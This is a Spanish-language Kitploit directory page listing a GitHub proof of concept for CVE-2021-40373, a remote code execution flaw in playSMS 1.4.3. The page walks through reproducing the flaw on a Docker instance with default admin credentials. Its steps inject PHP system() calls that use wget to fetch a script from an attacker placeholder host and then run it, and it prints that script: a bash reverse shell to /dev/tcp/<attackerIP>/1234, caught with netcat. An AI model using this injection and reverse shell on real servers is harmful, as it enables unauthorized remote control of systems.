Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-40373 — CVE-2021-40373 - ejecución remota de código | Kitploit
Herramientas/GitHubGitHub/maikroservice/cve-2021-40373
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubmaikroservice/cve-2021-40373

CVE-2021-40373

CVE-2021-40373 - ejecución remota de código

Ver Repositorio
1hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-playsms

Existe una vulnerabilidad en playsms 1.4.3 que permite a posibles atacantes ejecutar código de forma remota.

Cómo reproducir el RCE (shell):

https://playsms.org/

  • docker pull playsms/playsms:1.4.3
  • docker run -d -p 80:80 playsms/playsms
  • inicia sesión con admin:admin
  • http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • aloja un archivo bash malicioso en la máquina del atacante
  • descarga el archivo malicioso usando wget en la máquina
  • introduce <?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?>
  • guarda la información (desaparecerá del cuadro de entrada pero seguirá funcionando)
  • http://127.0.0.1/index.php?app=main&inc=core_welcome
  • recarga la página http://127.0.0.1/index.php?app=main&inc=core_main_config&op=main_config#tabs-information-page
  • haz chmod + y ejecuta el script de shell - <?php system("chmod +x rev.sh && ./rev.sh") ?>)
  • guarda y visita * http://127.0.0.1/index.php?app=main&inc=core_welcome para lograr la ejecución de código
  • ejecuta un manejador netcat local para capturar la shell remota

rev.sh

root@kitploit:~
#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"
Descargar herramienta